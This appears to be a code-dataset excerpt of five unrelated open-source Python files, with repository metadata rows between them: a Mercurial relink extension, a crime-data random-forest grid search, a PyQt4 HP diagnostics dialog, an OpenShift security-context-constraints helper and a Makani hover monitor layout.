if not util.samedevice(src, dst):
# No point in continuing
raise error.Abort(
_('source and destination are on different devices'))
if st.st_size != ts.st_size:
return False
return st
targets = []
total = len(candidates)
pos = 0
for fn, st in candidates:
pos += 1
srcpath = os.path.join(src, fn)
tgt = os.path.join(dst, fn)
ts = linkfilter(srcpath, tgt, st)
if not ts:
ui.debug('not linkable: %s\n' % fn)
continue
targets.append((fn, ts.st_size))
ui.progress(_('pruning'), pos, fn, _('files'), total)
ui.progress(_('pruning'), None)
ui.status(_('pruned down to %d probably relinkable files\n') % len(targets))
return targets
def do_relink(src, dst, files, ui):
def relinkfile(src, dst):
bak = dst + '.bak'
os.rename(dst, bak)
try:
util.oslink(src, dst)
except OSError:
os.rename(bak, dst)
raise
os.remove(bak)
CHUNKLEN = 65536
relinked = 0
savedbytes = 0
pos = 0
total = len(files)
for f, sz in files:
pos += 1
source = os.path.join(src, f)
tgt = os.path.join(dst, f)
# Binary mode, so that read() works correctly, especially on Windows
sfp = file(source, 'rb')
dfp = file(tgt, 'rb')
sin = sfp.read(CHUNKLEN)
while sin:
din = dfp.read(CHUNKLEN)
if sin != din:
break
sin = sfp.read(CHUNKLEN)
sfp.close()
dfp.close()
if sin:
ui.debug('not linkable: %s\n' % f)
continue
try:
relinkfile(source, tgt)
ui.progress(_('relinking'), pos, f, _('files'), total)
relinked += 1
savedbytes += sz
except OSError as inst:
ui.warn('%s: %s\n' % (tgt, str(inst)))
ui.progress(_('relinking'), None)
ui.status(_('relinked %d files (%s reclaimed)\n') %
(relinked, util.bytecount(savedbytes)))
| seewindcn/tortoisehg | src/hgext/relink.py | Python | gpl-2.0 | 6,459 |
# Parallelized gridsearch using a package that integrates Spark with scikit-learn.
# I couldn't run this in AWS EC2 because I couldn't manage to download
# the right versions of Spark, PySpark, Python, Pip, and the dependencies all together.
# It's definitely possible, just beyond my current linux abilities.
from sklearn import grid_search
from sklearn.ensemble import RandomForestClassifier
from spark_sklearn import GridSearchCV
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
##################### Data Wrangling #######################################
data_path = "./x_data_3.csv"
df = pd.read_csv(data_path, header=0)
x_data = df.drop('category', 1)
y = df.category.as_matrix()
x_complete = x_data.fillna(x_data.mean())
X_raw = x_complete.as_matrix()
X = MinMaxScaler().fit_transform(X_raw)
np.random.seed(0)
shuffle = np.random.permutation(np.arange(X.shape[0]))
X, y = X[shuffle], y[shuffle]
# Due to difficulties with log loss and set(y_pred) needing to match set(labels), we will remove the extremely rare
# crimes from the data for quality issues.
X_minus_trea = X[np.where(y != 'TREA')]
y_minus_trea = y[np.where(y != 'TREA')]
X_final = X_minus_trea[np.where(y_minus_trea != 'PORNOGRAPHY/OBSCENE MAT')]
y_final = y_minus_trea[np.where(y_minus_trea != 'PORNOGRAPHY/OBSCENE MAT')]
# Separate training, dev, and test data:
test_data, test_labels = X_final[800000:], y_final[800000:]
dev_data, dev_labels = X_final[700000:800000], y_final[700000:800000]
train_data, train_labels = X_final[100000:700000], y_final[100000:700000]
calibrate_data, calibrate_labels = X_final[:100000], y_final[:100000]
# Create mini versions of the above sets
mini_train_data, mini_train_labels = X_final[:20000], y_final[:20000]
mini_calibrate_data, mini_calibrate_labels = X_final[19000:28000], y_final[19000:28000]
mini_dev_data, mini_dev_labels = X_final[49000:60000], y_final[49000:60000]
##################### Grid Search #######################################
param_grid = {"max_depth": [3, None],
"max_features": [1, 3],
"min_samples_split": [2, 3],
"min_samples_leaf": [1, 3],
"bootstrap": [True, False],
"criterion": ["gini", "entropy"],
"n_estimators": [3, 4]}
gs = grid_search.GridSearchCV(RandomForestClassifier(), param_grid=param_grid)
gs.fit(mini_train_data, mini_train_labels)
| samgoodgame/sf_crime | iterations/spark-sklearn/random_forest_spark_mini.py | Python | mit | 2,464 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui4/pqdiagdialog_base.ui'
#
# Created: Mon May 4 14:30:35 2009
# by: PyQt4 UI code generator 4.4.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(700, 500)
self.gridlayout = QtGui.QGridLayout(Dialog)
self.gridlayout.setObjectName("gridlayout")
self.label = QtGui.QLabel(Dialog)
font = QtGui.QFont()
font.setPointSize(16)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridlayout.addWidget(self.label, 0, 0, 1, 1)
self.line = QtGui.QFrame(Dialog)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName("line")
self.gridlayout.addWidget(self.line, 1, 0, 1, 3)
self.DeviceComboBox = DeviceUriComboBox(Dialog)
self.DeviceComboBox.setObjectName("DeviceComboBox")
self.gridlayout.addWidget(self.DeviceComboBox, 2, 0, 1, 3)
self.LoadPaper = LoadPaperGroupBox(Dialog)
self.LoadPaper.setObjectName("LoadPaper")
self.gridlayout.addWidget(self.LoadPaper, 3, 0, 1, 3)
spacerItem = QtGui.QSpacerItem(410, 81, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridlayout.addItem(spacerItem, 4, 0, 1, 1)
spacerItem1 = QtGui.QSpacerItem(361, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridlayout.addItem(spacerItem1, 5, 0, 1, 1)
self.RunButton = QtGui.QPushButton(Dialog)
self.RunButton.setObjectName("RunButton")
self.gridlayout.addWidget(self.RunButton, 5, 1, 1, 1)
self.CancelButton = QtGui.QPushButton(Dialog)
self.CancelButton.setObjectName("CancelButton")
self.gridlayout.addWidget(self.CancelButton, 5, 2, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "HP Device Manager - Print Quality Diagnostics", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Dialog", "Print Quality Diagnostics", None, QtGui.QApplication.UnicodeUTF8))
self.RunButton.setText(QtGui.QApplication.translate("Dialog", "Run", None, QtGui.QApplication.UnicodeUTF8))
self.CancelButton.setText(QtGui.QApplication.translate("Dialog", "Cancel", None, QtGui.QApplication.UnicodeUTF8))
from .loadpapergroupbox import LoadPaperGroupBox
from .deviceuricombobox import DeviceUriComboBox
| matrumz/RPi_Custom_Files | Printing/hplip-3.15.2/ui4/pqdiagdialog_base.py | Python | gpl-2.0 | 2,746 |
# pylint: skip-file
# flake8: noqa
# pylint: disable=too-many-instance-attributes
class SecurityContextConstraintsConfig(object):
''' Handle scc options '''
# pylint: disable=too-many-arguments
def __init__(self,
sname,
kubeconfig,
options=None,
fs_group='MustRunAs',
default_add_capabilities=None,
groups=None,
priority=None,
required_drop_capabilities=None,
run_as_user='MustRunAsRange',
se_linux_context='MustRunAs',
supplemental_groups='RunAsAny',
users=None,
annotations=None):
''' constructor for handling scc options '''
self.kubeconfig = kubeconfig
self.name = sname
self.options = options
self.fs_group = fs_group
self.default_add_capabilities = default_add_capabilities
self.groups = groups
self.priority = priority
self.required_drop_capabilities = required_drop_capabilities
self.run_as_user = run_as_user
self.se_linux_context = se_linux_context
self.supplemental_groups = supplemental_groups
self.users = users
self.annotations = annotations
self.data = {}
self.create_dict()
def create_dict(self):
''' assign the correct properties for a scc dict '''
# allow options
if self.options:
for key, value in self.options.items():
self.data[key] = value
else:
self.data['allowHostDirVolumePlugin'] = False
self.data['allowHostIPC'] = False
self.data['allowHostNetwork'] = False
self.data['allowHostPID'] = False
self.data['allowHostPorts'] = False
self.data['allowPrivilegedContainer'] = False
self.data['allowedCapabilities'] = None
# version
self.data['apiVersion'] = 'v1'
# kind
self.data['kind'] = 'SecurityContextConstraints'
# defaultAddCapabilities
self.data['defaultAddCapabilities'] = self.default_add_capabilities
# fsGroup
self.data['fsGroup']['type'] = self.fs_group
# groups
self.data['groups'] = []
if self.groups:
self.data['groups'] = self.groups
# metadata
self.data['metadata'] = {}
self.data['metadata']['name'] = self.name
if self.annotations:
for key, value in self.annotations.items():
self.data['metadata'][key] = value
# priority
self.data['priority'] = self.priority
# requiredDropCapabilities
self.data['requiredDropCapabilities'] = self.required_drop_capabilities
# runAsUser
self.data['runAsUser'] = {'type': self.run_as_user}
# seLinuxContext
self.data['seLinuxContext'] = {'type': self.se_linux_context}
# supplementalGroups
self.data['supplementalGroups'] = {'type': self.supplemental_groups}
# users
self.data['users'] = []
if self.users:
self.data['users'] = self.users
# pylint: disable=too-many-instance-attributes,too-many-public-methods,no-member
class SecurityContextConstraints(Yedit):
''' Class to wrap the oc command line tools '''
default_add_capabilities_path = "defaultAddCapabilities"
fs_group_path = "fsGroup"
groups_path = "groups"
priority_path = "priority"
required_drop_capabilities_path = "requiredDropCapabilities"
run_as_user_path = "runAsUser"
se_linux_context_path = "seLinuxContext"
supplemental_groups_path = "supplementalGroups"
users_path = "users"
kind = 'SecurityContextConstraints'
def __init__(self, content):
'''SecurityContextConstraints constructor'''
super(SecurityContextConstraints, self).__init__(content=content)
self._users = None
self._groups = None
@property
def users(self):
''' users property getter '''
if self._users is None:
self._users = self.get_users()
return self._users
@property
def groups(self):
''' groups property getter '''
if self._groups is None:
self._groups = self.get_groups()
return self._groups
@users.setter
def users(self, data):
''' users property setter'''
self._users = data
@groups.setter
def groups(self, data):
''' groups property setter'''
self._groups = data
def get_users(self):
'''get scc users'''
return self.get(SecurityContextConstraints.users_path) or []
def get_groups(self):
'''get scc groups'''
return self.get(SecurityContextConstraints.groups_path) or []
def add_user(self, inc_user):
''' add a user '''
if self.users:
self.users.append(inc_user)
else:
self.put(SecurityContextConstraints.users_path, [inc_user])
return True
def add_group(self, inc_group):
''' add a group '''
if self.groups:
self.groups.append(inc_group)
else:
self.put(SecurityContextConstraints.groups_path, [inc_group])
return True
def remove_user(self, inc_user):
''' remove a user '''
try:
self.users.remove(inc_user)
except ValueError as _:
return False
return True
def remove_group(self, inc_group):
''' remove a group '''
try:
self.groups.remove(inc_group)
except ValueError as _:
return False
return True
def update_user(self, inc_user):
''' update a user '''
try:
index = self.users.index(inc_user)
except ValueError as _:
return self.add_user(inc_user)
self.users[index] = inc_user
return True
def update_group(self, inc_group):
''' update a group '''
try:
index = self.groups.index(inc_group)
except ValueError as _:
return self.add_group(inc_group)
self.groups[index] = inc_group
return True
def find_user(self, inc_user):
''' find a user '''
index = None
try:
index = self.users.index(inc_user)
except ValueError as _:
return index
return index
def find_group(self, inc_group):
''' find a group '''
index = None
try:
index = self.groups.index(inc_group)
except ValueError as _:
return index
return index
| mmahut/openshift-ansible | roles/lib_openshift/src/lib/scc.py | Python | apache-2.0 | 6,696 |
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layout to monitor hover status."""
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.plugins import common
from makani.gs.monitor2.apps.plugins.indicators import control
from makani.gs.monitor2.apps.plugins.indicators import ground_station
class HoverLayout(base.BaseLayout):
"""The hover layout."""
_NAME = 'Hover'
_DESIRED_VIEW_COLS = 12
_ORDER_HORIZONTALLY = True
# Derived class should set the _MODE.
_MODE = '<unset>'
def Initialize(self):
self._AddIndicators('Control', [
control.FlightPlanIndicator(),
control.FlightModeIndicator(self._MODE),
control.FlightModeGatesIndicator(self._MODE),
control.ControlTimeIndicator(self._MODE),
control.ControllerTimingIndicator(self._MODE),
control.JoystickIndicator(),
ground_station.WindIndicator(),
control.HoverGainRampScaleIndicator(self._MODE),
control.HoverDistanceFromPerch(common.FULL_COMMS_MODE),
control.WingVelocityIndicator(self._MODE),
control.HoverAngleCommandIndicator(),
control.HoverThrustMomentIndicator(self._MODE),
ground_station.PerchAzimuthIndicator(),
control.FdDisabledIndicator(),
control.FdAllActiveIndicator(),
], properties={'cols': 4})
widget_kwargs = {
'panel_ratio': 0.22,
'aspect_ratio': 2.8,
'num_yticks': 5,
}
self._AddIndicators('Charts', [
# TODO: Set value limits.
control.HoverPathErrorsChart(**widget_kwargs),
control.TensionChart(self._MODE, ylim=[0, 20], **widget_kwargs),
control.HoverPositionErrorsChart(ylim=[-17.0, 17.0], **widget_kwargs),
control.HoverVelocityErrorsChart(ylim=[-5.0, 5.0], **widget_kwargs),
control.HoverAnglesChart(self._MODE, ylim=[-90, 90], **widget_kwargs),
], properties={'cols': 4})
self._AddIndicators('', [
control.RotorPitchYawWindow(),
control.ConstraintWindow(self._MODE),
], properties={'cols': 3})
| google/makani | gs/monitor2/apps/plugins/layouts/hover_template.py | Python | apache-2.0 | 2,600 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.